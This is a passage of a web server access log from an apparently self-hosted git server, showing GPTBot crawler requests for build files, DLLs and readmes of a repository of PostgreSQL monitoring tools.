GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build" +[17/Feb/2026:13:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 9902] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:13:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:13:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build" +[17/Feb/2026:13:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:13:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10963685] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:13:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 11455] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:13:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 9901] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:13:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:13:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 10386] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:13:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 63765] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:13:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 118018] [Gzip 19.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:13:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:13:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10930] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10997] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 10856] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 10849] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 10854] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:13:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13037] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11160] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" +[17/Feb/2026:13:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10184] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48959] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:13:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9542] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17183] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:53:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1765752] [Gzip 21.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:13:53:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:13:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18352] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10183] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 525807] [Gzip 23.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:13:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 299024] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:13:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:13:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 76184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:13:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 166068] [Gzip 20.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:13:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1135869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:13:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 15771] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 83204] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16190] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" +[17/Feb/2026:13:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12106] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 